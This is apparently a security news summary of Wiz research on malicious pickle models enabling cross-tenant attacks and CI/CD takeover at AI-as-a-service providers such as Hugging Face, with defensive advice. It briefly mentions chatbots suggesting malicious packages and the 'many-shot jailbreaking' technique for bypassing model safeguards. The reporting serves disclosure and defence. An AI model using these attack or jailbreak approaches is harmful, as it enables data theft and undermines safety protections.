AI-as-a-Service Providers at Risk of Privilege Escalation and Cross-Tenant Attacks

Published:

spot_img

A new research study has uncovered critical vulnerabilities in artificial intelligence (AI)-as-a-service providers, such as Hugging Face, that could potentially allow threat actors to compromise sensitive data and access target environments. The study, conducted by Wiz researchers Shir Tamari and Sagi Tzadik, revealed that malicious models pose a significant risk to AI systems, especially those hosted by service providers, as attackers could exploit these models to launch cross-tenant attacks.

The risks identified in the study involve shared Inference infrastructure takeover and shared CI/CD takeover, enabling threat actors to run untrusted models in pickle format and execute supply chain attacks through the service’s CI/CD pipeline. The implications of such breaches could be severe, allowing attackers to breach the service’s custom models, escalate privileges, and access other customers’ data stored within the platform.

To address these vulnerabilities, researchers recommend implementing IMDSv2 with Hop Limit to prevent unauthorized access to the Instance Metadata Service and encourage users to source models from trusted providers, enable multi-factor authentication, and avoid using pickle files in production environments.

The disclosure of these findings follows recent research from Lasso Security, which highlighted the potential for generative AI models like OpenAI ChatGPT and Google Gemini to distribute malicious code packages. Additionally, AI company Anthropic introduced a new method called “many-shot jailbreaking” to exploit vulnerabilities in large language models and bypass safety protections.

As the use of AI continues to expand, it is crucial for organizations and service providers to prioritize security measures and proactively address vulnerabilities to safeguard against potential cyber threats and data breaches. The findings underscore the importance of exercising caution when utilizing AI technologies and highlight the need for ongoing efforts to enhance cybersecurity measures in the AI ecosystem.

spot_img

Related articles

Recent articles

Researchers Unveil 13-Year-Old Redis Flaw Affecting 330,000 Instances

Redis Vulnerability: What You Need to Know About the Critical Flaw Overview of the Redis Vulnerability A significant security flaw has been discovered in Redis, a...

UAE’s Space Sector Launches with $12 Billion Investment and Private Sector Boost

UAE's Bold Investment in Space: A Growing Partnership with the Private Sector The United Arab Emirates (UAE) is making significant strides in its burgeoning space...

Microsoft Attributes Recent GoAnywhere MFT Exploitation to Medusa Ransomware Group

Microsoft Links GoAnywhere MFT Exploitation to Medusa Ransomware Group Overview of the Situation Recent investigations by Microsoft reveal an alarming situation involving the exploitation of a...

Critical CVSS 10.0 Vulnerability Allows Remote Code Execution by Attackers

October 7, 2025Ravie LakshmananVulnerability / Cloud Security Critical Redis Security Vulnerability Uncovered Recent developments in cloud security have brought to light a serious vulnerability in Redis,...